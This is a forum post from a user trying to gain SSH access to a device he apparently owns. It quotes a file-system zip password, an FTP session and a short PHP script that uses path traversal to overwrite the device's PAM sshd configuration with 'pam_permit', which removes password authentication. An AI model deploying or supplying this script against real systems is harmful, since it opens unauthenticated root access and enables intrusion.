It could be....the password for the zip file to unzip the file system is
YvSInIQopeipx66t_DCdfEvfP47qeVPhNhAuSYmA4
. Someone retrieved it using a disassembler on the file system.
I did some more reading, and one person was able to use php to allow ssh login. The box allows one to create a web space, and it comes with php installed. One can edit the php.ini file, and I can upload via ftp a php script. The script they suggested is:
<?php$file = '../../../../etc/pam.d/sshd';
$fh=fopen($file, 'w') or die("can't open file");$stringData = "account required pam_unix.so\n";
fwrite($fh, $stringData);$stringData = "session required pam_unix.so\n";
fwrite($fh, $stringData);$stringData = "auth required pam_permit.so\n";
fwrite($fh, $stringData);fclose($fh);
?>I uploaded the script, but I get a 404 File not Found when I access the page. I thought it might be a file permission error since the file is only rw. I tried chmod 777 at the ftp prompt, and got the error message File not Found, but ls shows it is there.
ftp> ls200 PORT command successful
150 Opening ASCII mode data connection for file listdrwxrwxrwx 2 apache apache 6 Jul 17 08:23 cgi-bin
drwxrwxrwx 2 apache apache 22 Jul 17 08:23 htdocsdrwxrwxrwx 2 apache apache 39 Jul 17 08:23 log
-rw-rw-rw- 1 hammerhead hdusers 335 Jul 17 08:49 script.php226 Transfer complete
ftp> chmod 777 script.php550 CHMOD 777 script.php: No such file or directory
ftp> Is there anything I can change in the php.ini file to make this script execute? Or, am I missing something else?
BTW, I cannot ftp as root, but I can ftp as a user I created, hammerhead.
Thanks,
Mark